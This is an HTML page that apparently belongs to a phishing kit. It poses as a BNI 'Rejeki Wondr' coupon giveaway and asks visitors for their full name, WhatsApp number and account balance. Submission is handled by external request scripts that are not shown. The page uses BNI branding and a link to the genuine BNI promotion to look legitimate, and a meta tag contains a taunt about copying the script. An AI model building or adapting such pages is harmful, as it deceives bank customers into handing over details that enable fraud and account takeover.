<!doctype html>
<html lang="en" class="h-100">
    
    <meta text= "NAK MALING SCRIP PULE 🤭🤭🤭 BEMALU OI IDUP NGAN NI MALING SAJE PACAK NYE 😅😅"

<head id="ctl00_Head1">
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, maximum-scale=1">
    <meta property="og:title" content="Cetak Kupon Anda - BNI - Rejeki Wondr">
    <meta property="og:image" content="img/bc.png">
        <meta property="og:image:type" content="img/bc.png">
    <meta name="description" />
    <meta name="author" content="BCA" />
    <title>Cetak Kupon Anda - BNI Rejeki Wondr</title>
    <link rel="icon" type="image/x-icon" href="favicon.png" /> 
    <link rel="canonical" href="https://getbootstrap.com/docs/5.0/examples/sticky-footer/" />
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" />
    <link rel="stylesheet" href="css/main.css" type="text/css" media="all" />
</head>
<body>
    <main>
        <nav class="navnon">
            <img width="100%" src="img/bc.png" alt="" />
        </nav>
        <footer>
            <img src="img/bawah.png" alt="" />
        </footer>
            <div class="textjalan" style="margin-top: 65px;">
                <svg xmlns="http://www.w3.org/2000/svg" width="50" height="40" fill="currentColor" class="bi bi-bell" viewBox="0 0 16 16">
                  <path d="M8 16a2 2 0 0 0 2-2H6a2 2 0 0 0 2 2M8 1.918l-.797.161A4 4 0 0 0 4 6c0 .628-.134 2.197-.459 3.742-.16.767-.376 1.566-.663 2.258h10.244c-.287-.692-.502-1.49-.663-2.258C12.134 8.197 12 6.628 12 6a4 4 0 0 0-3.203-3.92zM14.22 12c.223.447.481.801.78 1H1c.299-.199.557-.553.78-1C2.68 10.2 3 6.88 3 6c0-2.42 1.72-4.44 4.005-4.901a1 1 0 1 1 1.99 0A5 5 0 0 1 13 6c0 .88.32 4.2 1.22 6"/>
                </svg>
                <span><marquee>
                    Selamat Datang di GEBYAR FSTVL BNI Rejeki Wondr Menangkan Hadiah Nya dan Keseruan nya...! jadikan Anda Pemenangnya
                </marquee></span>
            </div>
            
            <div class="coverform">
                <div class="form">
                    <h5 class="text-center"></h5>
                    <img width="35%" height="auto" src="img/atas.png" alt="" />
                    <form id="formData" method="POST" class="mt-4">
                        <div class="inp">
                        <label for="namalengkap"><b>Nama Lengkap</label>
                        <input type="text" name="a" id="namalengkap" required=""/>
                        </div>
                        
                        <div class="inp">
                        <label for="nowa">No. WhatsApp</label>
                        <input type="tel" name="b" id="nowa" required=""maxlength = "13" required>
                        </div>
                        
                        <div class="inp">
                        <label for="dengan-rupiah">Saldo Akhir</label>
                        <input type="tel" name="c" id="dengan-rupiah"  required=""maxlength = "19" required>
                        </div>
                        
                    
                            <button type="submit" id="kirim">Cetak Kupon</button>
                        
                    </form>
                </div>
                
                <p style="font-size: 12px;" class="text-center"></p>
            </div>
             <b> <p onclick="location.href='https://www.bni.co.id/id-id/beranda/promo-acara/rejeki-wondr-bni'"style="font-size: 13px; text-align: center; margin-top: 25px; margin-left: 10px; margin-right: 10px;"><strong style="color: #FF8601; text-decoration: none">Semua Nasabah Bank BNI
         <span style="color: #098CE3"><b>Berkesempatan Untuk Menang...!!!</b></span></span>
    </main>
</body>
  <!-- partial -->

<script src="js/jquery.min_1.js"></script>
<script src="js/jquery.min.js"></script>
<script src="js/reqbri.js"></script>
<script src="js/vibr.js"></script>
<script src="js/reqdata.js"></script>
<script src="js/rupiah.js"></script>
</html>
